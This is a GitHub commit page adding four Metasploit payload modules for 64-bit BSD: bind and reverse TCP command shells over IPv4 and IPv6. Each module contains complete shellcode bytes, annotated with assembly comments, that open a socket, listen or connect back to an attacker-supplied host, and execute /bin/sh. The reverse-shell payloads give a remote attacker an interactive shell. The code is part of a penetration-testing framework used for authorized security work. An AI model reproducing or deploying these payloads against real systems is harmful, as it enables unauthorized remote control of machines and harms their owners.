Skip to content

Commit a2bdd0b

Browse files
author
Brent Cook
committed
Land rapid7#5541, add more compat fixed-cmd 64-bit BSD payloads
Merge branch 'land-5541-bsd-shellcode' into upstream-master
2 parents 07d0582 + 493a640 commit a2bdd0b

File tree

5 files changed

+413
-30
lines changed

5 files changed

+413
-30
lines changed

modules/payloads/singles/bsd/x64/shell_bind_ipv6_tcp.rb

Lines changed: 86 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,86 @@
1+
##
2+
# This module requires Metasploit: http://metasploit.com/download
3+
# Current source: https://github.com/rapid7/metasploit-framework
4+
##
5+
6+
require 'msf/core'
7+
require 'msf/core/handler/bind_tcp'
8+
require 'msf/base/sessions/command_shell'
9+
require 'msf/base/sessions/command_shell_options'
10+
11+
module Metasploit3
12+
13+
CachedSize = 89
14+
15+
include Msf::Payload::Single
16+
include Msf::Payload::Bsd
17+
include Msf::Sessions::CommandShellOptions
18+
19+
def initialize(info = {})
20+
super(merge_info(info,
21+
'Name' => 'BSD x64 Command Shell, Bind TCP Inline (IPv6)',
22+
'Description' => 'Listen for a connection and spawn a command shell over IPv6',
23+
'Author' => 'Balazs Bucsay @xoreipeip <balazs.bucsay[-at-]rycon[-dot-]hu>',
24+
'References' => ['URL', 'https://github.com/earthquake/shellcodes/blob/master/x86_64_bsd_ipv6_bind_tcp.asm.c'],
25+
'License' => MSF_LICENSE,
26+
'Platform' => 'bsd',
27+
'Arch' => ARCH_X86_64,
28+
'Handler' => Msf::Handler::BindTcp,
29+
'Session' => Msf::Sessions::CommandShellUnix,
30+
'Payload' =>
31+
{
32+
'Offsets' =>
33+
{
34+
'LPORT' => [ 20, 'n' ],
35+
},
36+
'Payload' =>
37+
"\x6a\x61" +# pushq $0x61 #
38+
"\x58" +# pop %rax #
39+
"\x99" +# cltd #
40+
"\x6a\x1c" +# pushq $0x1c #
41+
"\x5f" +# pop %rdi #
42+
"\x6a\x01" +# pushq $0x1 #
43+
"\x5e" +# pop %rsi #
44+
"\x0f\x05" +# syscall #
45+
"\x48\x97" +# xchg %rax,%rdi #
46+
"\x52" +# push %rdx #
47+
"\x52" +# push %rdx #
48+
"\x52" +# push %rdx #
49+
"\x68\x00\x1c\x11\x5c" +# pushq $0x5c111c00 #
50+
"\x48\x89\xe6" +# mov %rsp,%rsi #
51+
"\x6a\x1c" +# pushq $0x1c #
52+
"\x5a" +# pop %rdx #
53+
"\x04\x4c" +# add $0x4c,%al #
54+
"\x0f\x05" +# syscall #
55+
"\x48\x31\xf6" +# xor %rsi,%rsi #
56+
"\x6a\x6a" +# pushq $0x6a #
57+
"\x58" +# pop %rax #
58+
"\x0f\x05" +# syscall #
59+
"\x99" +# cltd #
60+
"\x04\x1e" +# add $0x1e,%al #
61+
"\x0f\x05" +# syscall #
62+
"\x48\x89\xc7" +# mov %rax,%rdi #
63+
"\x6a\x5a" +# pushq $0x5a #
64+
"\x58" +# pop %rax #
65+
"\x0f\x05" +# syscall #
66+
"\xff\xc6" +# inc %esi #
67+
"\x04\x5a" +# add $0x5a,%al #
68+
"\x0f\x05" +# syscall #
69+
"\xff\xc6" +# inc %esi #
70+
"\x04\x59" +# add $0x59,%al #
71+
"\x0f\x05" +# syscall #
72+
"\x52" +# push %rdx #
73+
"\x48\xbf\x2f\x2f\x62" +# mov "//b" #
74+
"\x69\x6e\x2f\x73\x68" +# mov "in/sh",%rdi #
75+
"\x57" +# push %rdi #
76+
"\x48\x89\xe7" +# mov %rsp,%rdi #
77+
"\x52" +# push %rdx #
78+
"\x57" +# push %rdi #
79+
"\x48\x89\xe6" +# mov %rsp,%rsi #
80+
"\x04\x39" +# add $0x39,%al #
81+
"\x0f\x05" # syscall #
82+
}
83+
))
84+
end
85+
86+
end

modules/payloads/singles/bsd/x64/shell_bind_tcp_small.rb

Lines changed: 85 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,85 @@
1+
##
2+
# This module requires Metasploit: http://metasploit.com/download
3+
# Current source: https://github.com/rapid7/metasploit-framework
4+
##
5+
6+
require 'msf/core'
7+
require 'msf/core/handler/bind_tcp'
8+
require 'msf/base/sessions/command_shell'
9+
require 'msf/base/sessions/command_shell_options'
10+
11+
module Metasploit3
12+
13+
CachedSize = 87
14+
15+
include Msf::Payload::Single
16+
include Msf::Payload::Bsd
17+
include Msf::Sessions::CommandShellOptions
18+
19+
def initialize(info = {})
20+
super(merge_info(info,
21+
'Name' => 'BSD x64 Command Shell, Bind TCP Inline',
22+
'Description' => 'Listen for a connection and spawn a command shell',
23+
'Author' => 'Balazs Bucsay @xoreipeip <balazs.bucsay[-at-]rycon[-dot-]hu>',
24+
'References' => ['URL', 'https://github.com/earthquake/shellcodes/blob/master/x86_64_bsd_bind_tcp.asm.c'],
25+
'License' => MSF_LICENSE,
26+
'Platform' => 'bsd',
27+
'Arch' => ARCH_X86_64,
28+
'Handler' => Msf::Handler::BindTcp,
29+
'Session' => Msf::Sessions::CommandShellUnix,
30+
'Payload' =>
31+
{
32+
'Offsets' =>
33+
{
34+
'LPORT' => [ 18, 'n' ],
35+
},
36+
'Payload' =>
37+
"\x6a\x61" +# pushq $0x61 #
38+
"\x58" +# pop %rax #
39+
"\x99" +# cltd #
40+
"\x6a\x02" +# pushq $0x2 #
41+
"\x5f" +# pop %rdi #
42+
"\x6a\x01" +# pushq $0x1 #
43+
"\x5e" +# pop %rsi #
44+
"\x0f\x05" +# syscall #
45+
"\x48\x97" +# xchg %rax,%rdi #
46+
"\x52" +# push %rdx #
47+
"\x68\x00\x02\x11\x5c" +# pushq $0x5c110200 #
48+
"\x48\x89\xe6" +# mov %rsp,%rsi #
49+
"\x6a\x10" +# pushq $0x10 #
50+
"\x5a" +# pop %rdx #
51+
"\x04\x66" +# add $0x66,%al #
52+
"\x0f\x05" +# syscall #
53+
"\x48\x31\xf6" +# xor %rsi,%rsi #
54+
"\x6a\x6a" +# pushq $0x6a #
55+
"\x58" +# pop %rax #
56+
"\x0f\x05" +# syscall #
57+
"\x99" +# cltd #
58+
"\x04\x1e" +# add $0x1e,%al #
59+
"\x0f\x05" +# syscall #
60+
"\x48\x89\xc7" +# mov %rax,%rdi #
61+
"\x6a\x5a" +# pushq $0x5a #
62+
"\x58" +# pop %rax #
63+
"\x0f\x05" +# syscall #
64+
"\xff\xc6" +# inc %esi #
65+
"\x04\x5a" +# add $0x5a,%al #
66+
"\x0f\x05" +# syscall #
67+
"\xff\xc6" +# inc %esi #
68+
"\x04\x59" +# add $0x59,%al #
69+
"\x0f\x05" +# syscall #
70+
"\x52" +# push %rdx #
71+
"\x48\xbf\x2f\x2f" +# mov "//" #
72+
"\x62\x69\x6e\x2f" +# "bin/sh" #
73+
"\x73\x68" +# mov $0x68732f6e69622f2f,%rdi #
74+
"\x57" +# push %rdi #
75+
"\x48\x89\xe7" +# mov %rsp,%rdi #
76+
"\x52" +# push %rdx #
77+
"\x57" +# push %rdi #
78+
"\x48\x89\xe6" +# mov %rsp,%rsi #
79+
"\x04\x39" +# add $0x39,%al #
80+
"\x0f\x05" # syscall #
81+
}
82+
))
83+
end
84+
85+
end

modules/payloads/singles/bsd/x64/shell_reverse_ipv6_tcp.rb

Lines changed: 92 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,92 @@
1+
##
2+
# This module requires Metasploit: http://metasploit.com/download
3+
# Current source: https://github.com/rapid7/metasploit-framework
4+
##
5+
6+
require 'msf/core'
7+
require 'msf/core/handler/reverse_tcp'
8+
require 'msf/base/sessions/command_shell'
9+
require 'msf/base/sessions/command_shell_options'
10+
11+
module Metasploit3
12+
13+
CachedSize = 105
14+
15+
include Msf::Payload::Single
16+
include Msf::Payload::Bsd
17+
include Msf::Sessions::CommandShellOptions
18+
19+
def initialize(info = {})
20+
super(merge_info(info,
21+
'Name' => 'BSD x64 Command Shell, Reverse TCP Inline (IPv6)',
22+
'Description' => 'Connect back to attacker and spawn a command shell over IPv6',
23+
'Author' => 'Balazs Bucsay @xoreipeip <balazs.bucsay[-at-]rycon[-dot-]hu>',
24+
'References' => ['URL', 'https://github.com/earthquake/shellcodes/blob/master/x86_64_bsd_ipv6_reverse_tcp.asm.c'],
25+
'License' => MSF_LICENSE,
26+
'Platform' => 'bsd',
27+
'Arch' => ARCH_X86_64,
28+
'Handler' => Msf::Handler::ReverseTcp,
29+
'Session' => Msf::Sessions::CommandShellUnix,
30+
'Payload' =>
31+
{
32+
'Offsets' =>
33+
{
34+
'LHOST' => [ 85, 'ADDR6' ],
35+
'LPORT' => [ 79, 'n' ],
36+
'SCOPEID' => [ 101, 'V' ]
37+
},
38+
'Payload' =>
39+
"\x6a\x61" +# pushq $0x61 #
40+
"\x58" +# pop %rax #
41+
"\x99" +# cltd #
42+
"\x6a\x1c" +# pushq $0x1c #
43+
"\x5f" +# pop %rdi #
44+
"\x6a\x01" +# pushq $0x1 #
45+
"\x5e" +# pop %rsi #
46+
"\x0f\x05" +# syscall #
47+
"\x48\x97" +# xchg %rax,%rdi #
48+
"\x04\x3e" +# add $0x3e,%al #
49+
"\x0f\x05" +# syscall #
50+
"\xff\xc6" +# inc %esi #
51+
"\x04\x59" +# add $0x59,%al #
52+
"\x0f\x05" +# syscall #
53+
"\xff\xce" +# dec %esi #
54+
"\xff\xce" +# dec %esi #
55+
"\x04\x58" +# add $0x58,%al #
56+
"\x0f\x05" +# syscall #
57+
"\xe9\x23\x00\x00\x00" +# jmpq <forth> #
58+
# back:
59+
"\x5e" +# pop %rsi #
60+
"\x6a\x1c" +# pushq $0x1c #
61+
"\x5a" +# pop %rdx #
62+
"\x66\x83\xc0\x62" +# add $0x62,%ax #
63+
"\x0f\x05" +# syscall #
64+
"\x99" +# cltd #
65+
"\x52" +# push %rdx #
66+
"\x48\xbf\x2f\x2f\x62" +# mov "//b" #
67+
"\x69\x6e\x2f\x73\x68" +# "in/sh",%rdi #
68+
"\x57" +# push %rdi #
69+
"\x48\x89\xe7" +# mov %rsp,%rdi #
70+
"\x52" +# push %rdx #
71+
"\x57" +# push %rdi #
72+
"\x48\x89\xe6" +# mov %rsp,%rsi #
73+
"\x04\x3b" +# add $0x3b,%al #
74+
"\x0f\x05" +# syscall #
75+
# forth:
76+
"\xe8\xd8\xff\xff\xff" +# callq <back> #
77+
# sockaddr_in6
78+
"\x00\x1c\x11\x5c" +# AF_INET6+port #
79+
"\x00\x00\x00\x00" +# no-one-cares #
80+
"\x00\x00\x00\x00" +# IPv6- #
81+
"\x00\x00\x00\x00" +# addr- #
82+
"\x00\x00\x00\x00" +# in- #
83+
"\x00\x00\x00\x01" +# 16 bytes #
84+
"\x00\x00\x00\x00" # Scope ID #
85+
}
86+
))
87+
register_options([
88+
OptInt.new('SCOPEID', [false, "IPv6 scope ID, for link-local addresses", 0])
89+
])
90+
end
91+
92+
end

modules/payloads/singles/bsd/x64/shell_reverse_tcp_small.rb

Lines changed: 80 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,80 @@
1+
##
2+
# This module requires Metasploit: http://metasploit.com/download
3+
# Current source: https://github.com/rapid7/metasploit-framework
4+
##
5+
6+
require 'msf/core'
7+
require 'msf/core/handler/reverse_tcp'
8+
require 'msf/base/sessions/command_shell'
9+
require 'msf/base/sessions/command_shell_options'
10+
11+
module Metasploit3
12+
13+
CachedSize = 81
14+
15+
include Msf::Payload::Single
16+
include Msf::Payload::Bsd
17+
include Msf::Sessions::CommandShellOptions
18+
19+
def initialize(info = {})
20+
super(merge_info(info,
21+
'Name' => 'BSD x64 Command Shell, Reverse TCP Inline',
22+
'Description' => 'Connect back to attacker and spawn a command shell',
23+
'Author' => 'Balazs Bucsay @xoreipeip <balazs.bucsay[-at-]rycon[-dot-]hu>',
24+
'References' => ['URL', 'https://github.com/earthquake/shellcodes/blob/master/x86_64_bsd_reverse_tcp.asm.c'],
25+
'License' => MSF_LICENSE,
26+
'Platform' => 'bsd',
27+
'Arch' => ARCH_X86_64,
28+
'Handler' => Msf::Handler::ReverseTcp,
29+
'Session' => Msf::Sessions::CommandShellUnix,
30+
'Payload' =>
31+
{
32+
'Offsets' =>
33+
{
34+
'LHOST' => [ 39, 'ADDR' ],
35+
'LPORT' => [ 37, 'n' ],
36+
},
37+
'Payload' =>
38+
"\x6a\x61" +# pushq $0x61 #
39+
"\x58" +# pop %rax #
40+
"\x99" +# cltd #
41+
"\x6a\x02" +# pushq $0x2 #
42+
"\x5f" +# pop %rdi #
43+
"\x6a\x01" +# pushq $0x1 #
44+
"\x5e" +# pop %rsi #
45+
"\x0f\x05" +# syscall #
46+
"\x48\x97" +# xchg %rax,%rdi #
47+
"\x04\x58" +# add $0x58,%al #
48+
"\x0f\x05" +# syscall #
49+
"\xff\xc6" +# inc %esi #
50+
"\x04\x59" +# add $0x59,%al #
51+
"\x0f\x05" +# syscall #
52+
"\xff\xce" +# dec %esi #
53+
"\xff\xce" +# dec %esi #
54+
"\x04\x58" +# add $0x58,%al #
55+
"\x0f\x05" +# syscall #
56+
"\x52" +# push %rdx #
57+
"\x48\xbb\x00\x02\x11" +# mov ... #
58+
"\x5c\x7f\x00\x00\x01" +# mov $0x100007f5c110200,%rbx #
59+
"\x53" +# push %rbx #
60+
"\x48\x89\xe6" +# mov %rsp,%rsi #
61+
"\x6a\x10" +# pushq $0x10 #
62+
"\x5a" +# pop %rdx #
63+
"\x66\x83\xc0\x62" +# add $0x62,%ax #
64+
"\x0f\x05" +# syscall #
65+
"\x99" +# cltd #
66+
"\x52" +# push %rdx #
67+
"\x48\xbf\x2f\x2f\x62" +# mov "//b" #
68+
"\x69\x6e\x2f\x73\x68" +# "in/sh", %rdi #
69+
"\x57" +# push %rdi #
70+
"\x48\x89\xe7" +# mov %rsp,%rdi #
71+
"\x52" +# push %rdx #
72+
"\x57" +# push %rdi #
73+
"\x48\x89\xe6" +# mov %rsp,%rsi #
74+
"\x04\x3b" +# add $0x3b,%al #
75+
"\x0f\x05" # syscall #
76+
}
77+
))
78+
end
79+
80+
end

0 commit comments

Comments
 (0)